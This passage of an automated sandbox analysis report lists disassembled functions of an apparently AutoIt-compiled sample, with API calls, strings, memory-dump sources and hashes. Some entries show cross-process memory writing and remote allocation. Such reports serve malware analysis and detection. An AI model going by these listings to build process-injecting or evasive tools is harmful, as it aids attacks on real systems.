                                    • Instruction ID: 8f9bbf84d9c719a86ad8372bf59e268435a320e341ca4ea3f4a1b51728f88cc4
                                    • Opcode Fuzzy Hash: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
                                    • Instruction Fuzzy Hash: 3AE0C236018601FFDA115FE1EC1C90ABB79FB89B62B108230F219C1870CB329560EB90
                                    Function 00892CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008A0DB6: std::exception::exception.LIBCMT ref: 008A0DEC
                                      • Part of subcall function 008A0DB6: __CxxThrowException@8.LIBCMT ref: 008A0E01
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 00887A51: _memmove.LIBCMT ref: 00887AAB
                                    • __swprintf.LIBCMT ref: 00892ECD
                                    Strings
                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00892D66
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                    • API String ID: 1943609520-557222456
                                    • Opcode ID: b7cde44654f9658757ecbd4cdd14be87b3f9773bfe1d9af08c1a4564780127f4
                                    • Instruction ID: aac83b38451b3d2b410e622df3ddf9dca7e910568e922718b3ea5d7032ce5881
                                    • Opcode Fuzzy Hash: b7cde44654f9658757ecbd4cdd14be87b3f9773bfe1d9af08c1a4564780127f4
                                    • Instruction Fuzzy Hash: F9913671108215ABDB14FF28C885D6EB7B4FF85720F14492DF496DB2A2EA30ED44CB52
                                    Function 008EB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                    • CoInitialize.OLE32(00000000), ref: 008EB9BB
                                    • CoCreateInstance.COMBASE(00912D6C,00000000,00000001,00912BDC,?), ref: 008EB9D4
                                    • CoUninitialize.COMBASE ref: 008EB9F1
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                    • String ID: .lnk
                                    • API String ID: 2126378814-24824748
                                    • Opcode ID: b7f97ca1072cbdd7c4b341925ac19f667c68b411a0f84cb9c4007587b96cbf0d
                                    • Instruction ID: 8d306c58eb34defc2df35f5b6693fa29aada6b168763742fc0e8365e26591bda
                                    • Opcode Fuzzy Hash: b7f97ca1072cbdd7c4b341925ac19f667c68b411a0f84cb9c4007587b96cbf0d
                                    • Instruction Fuzzy Hash: 4FA135756043469FCB00EF19C884D6ABBE5FF8A324F148958F8999B361CB31ED45CB92
                                    Function 008A501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 008A50AD
                                      • Part of subcall function 008B00F0: __87except.LIBCMT ref: 008B012B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 6e975829ba9d35fa723074f7246c00574f6007b87c0ae85627d20fe554992c06
                                    • Instruction ID: 06a7d900585f3c661f525cc7157129d20fa7157dc4e536027cd40bbdd9b8ce64
                                    • Opcode Fuzzy Hash: 6e975829ba9d35fa723074f7246c00574f6007b87c0ae85627d20fe554992c06
                                    • Instruction Fuzzy Hash: B0515D21A1CE0696E715B718C8053FF7B94FB42700F208959E4D5C6799EE348DC8EE82
                                    Function 00896192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memset$_memmove
                                    • String ID: ERCP
                                    • API String ID: 2532777613-1384759551
                                    • Opcode ID: b487f9fbac8e9e6fb302b5110b924287e043f84e1785fe12f6934d9117e2226f
                                    • Instruction ID: e576b7615c36705ad39ece79ff6961d5b4e676d986c277731278bf6e6f1a9f6a
                                    • Opcode Fuzzy Hash: b487f9fbac8e9e6fb302b5110b924287e043f84e1785fe12f6934d9117e2226f
                                    • Instruction Fuzzy Hash: D151B071900309DFDB24DFA9C941BAAB7E5FF04314F24466EE44ACB291E770AA50DF40
                                    Function 008D97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008E14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008D9296,?,?,00000034,00000800,?,00000034), ref: 008E14E6
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008D983F
                                      • Part of subcall function 008E1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008D92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008E14B1
                                      • Part of subcall function 008E13DE: GetWindowThreadProcessId.USER32(?,?), ref: 008E1409
                                      • Part of subcall function 008E13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008D925A,00000034,?,?,00001004,00000000,00000000), ref: 008E1419
                                      • Part of subcall function 008E13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008D925A,00000034,?,?,00001004,00000000,00000000), ref: 008E142F
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008D98AC
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008D98F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    • API String ID: 4150878124-2766056989
                                    • Opcode ID: f7c4e248de33641389f52bd98d7bf3d7c3385b8a6ff3fa45b25053e1a7dac305
                                    • Instruction ID: cbf4242283cb427104b2d9a39419efba453abc2b8d7c9e8bfffe45fd7762f544
                                    • Opcode Fuzzy Hash: f7c4e248de33641389f52bd98d7bf3d7c3385b8a6ff3fa45b25053e1a7dac305
                                    • Instruction Fuzzy Hash: 16412D76900218BEDF10DFA4CC95EDEBBB8FB09700F004199F945B7291DA716E45DBA1
                                    Function 00907946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0090F910,00000000,?,?,?,?), ref: 009079DF
                                    • GetWindowLongW.USER32 ref: 009079FC
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00907A0C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: f49437fba8285d23066340000646d4ebdce8ebd0b7f7c3cd3efed30ef576215a
                                    • Instruction ID: c50644d91091c1507ca04ea1ab8da8acc208a4384b1d22a3f5860b76793c7775
                                    • Opcode Fuzzy Hash: f49437fba8285d23066340000646d4ebdce8ebd0b7f7c3cd3efed30ef576215a
                                    • Instruction Fuzzy Hash: FF31AB31604606AFDB219EB8CC45BEBB7A9FB49334F208725F875E22E0D731E9519B50
                                    Function 009073D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00907461
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00907475
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00907499
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: c91caaba404389f0d816759702626dea0d3704ee33f46d858beb6d64d456bbd1
                                    • Instruction ID: 9f042db68d60557cbb334769c8d8371873f5d2abbca2464649ede71f5c7141c9
                                    • Opcode Fuzzy Hash: c91caaba404389f0d816759702626dea0d3704ee33f46d858beb6d64d456bbd1
                                    • Instruction Fuzzy Hash: DB218032514219AFDF118F94CC46FEA7B6AEB48724F110214FE15AB1E0DAB5A8519BA0
                                    Function 00907B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00907C4A
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00907C58
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00907C5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: f32b131edfca808b2ab4b0d85e60aa566cf4f94003cd4ddd2c1825891918e1e1
                                    • Instruction ID: 93e9fe650d9cd82112754978dfddffaa29c40100e0ac12a53a72e779536d0471
                                    • Opcode Fuzzy Hash: f32b131edfca808b2ab4b0d85e60aa566cf4f94003cd4ddd2c1825891918e1e1
                                    • Instruction Fuzzy Hash: 20218EB5604219AFEB10DF68DCC1DA677ECEF5A364B140059FA01DB3A1CB31EC519B60
                                    Function 00906CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00906D3B
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00906D4B
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00906D70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: f85a7d14ffc2c73d62fb614e6ab7c8163bc08966adba5f28def67c8b3daa7ca6
                                    • Instruction ID: 081e4c61d4cc867958d622ddd458b2832ff46bd6eaab73fd73b3a3cff35f6939
                                    • Opcode Fuzzy Hash: f85a7d14ffc2c73d62fb614e6ab7c8163bc08966adba5f28def67c8b3daa7ca6
                                    • Instruction Fuzzy Hash: 52218032610118BFEF118F54DC45FAB3BBEEB89764F018124FA459B1E0CB71AC619BA0
                                    Function 0090770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00907772
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00907787
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00907794
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: 2ba2aa6706988005a16a72f598e9bb857df4aab2fcf96d8e1c9e17bc0219ef9e
                                    • Instruction ID: 7809f49086fd5a2fd623390755924792f53112b0069256e08592b419174d6493
                                    • Opcode Fuzzy Hash: 2ba2aa6706988005a16a72f598e9bb857df4aab2fcf96d8e1c9e17bc0219ef9e
                                    • Instruction Fuzzy Hash: 99110432604209BEEF205FA4CC05FA777ACEF88B64F010128FA41920D0C672E811DB10
                                    Function 00884B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00884AD0), ref: 00884B45
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00884B57
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                                    • Instruction ID: d7a178d9d750f48432833be6aa3a196830e4f1d6180814c45318ae64ddc8ec23
                                    • Opcode Fuzzy Hash: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                                    • Instruction Fuzzy Hash: 2AD01235A14713CFD730AF72D838B0676D4FF45355B1188399485D6990E670E580CB54
                                    Function 00884C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00884BD0,?,00884DEF,?,009452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884C11
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884C23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: 35754cf855ed74607ab95e5492fa73f26f1c8ce08ea35fc0f057b3282c5a2355
                                    • Instruction ID: 1629bfa7fa59b06c7150d11fb8ceb4bfd5842306a067d96003cb28150710458f
                                    • Opcode Fuzzy Hash: 35754cf855ed74607ab95e5492fa73f26f1c8ce08ea35fc0f057b3282c5a2355
                                    • Instruction Fuzzy Hash: C2D01231515723CFD730AF71D918606B6DAFF09355B118C39D485D6550E6B0D580CB50
                                    Function 00884C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00884B83,?), ref: 00884C44
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884C56
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: 61bb3d8a46b04f4e90148d01f151059716071070773a6cc48776acda238eedce
                                    • Instruction ID: 44414b84f1f117ba099a03b75f44ce5f9fb031c62cb23e1bd0598fa8f92277be
                                    • Opcode Fuzzy Hash: 61bb3d8a46b04f4e90148d01f151059716071070773a6cc48776acda238eedce
                                    • Instruction Fuzzy Hash: 1CD01772528713CFD730AF31D91860A76E9FF19355B12883AA496D69A0E670D980CB50
                                    Function 00900DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00901039), ref: 00900DF5
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00900E07
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: 1757015d9e2c2e10f26d6d1de5d1c285314288e0ec43571b218fc59706a66cec
                                    • Instruction ID: fa0bd1d556e342e58000aae9a15beab43499d4cb68f4898c08f75b0475197e0a
                                    • Opcode Fuzzy Hash: 1757015d9e2c2e10f26d6d1de5d1c285314288e0ec43571b218fc59706a66cec
                                    • Instruction Fuzzy Hash: 76D01770528722CFD7219F75C80878676E9AF84356F118C3EA886E2590E6B0D8D0CA50
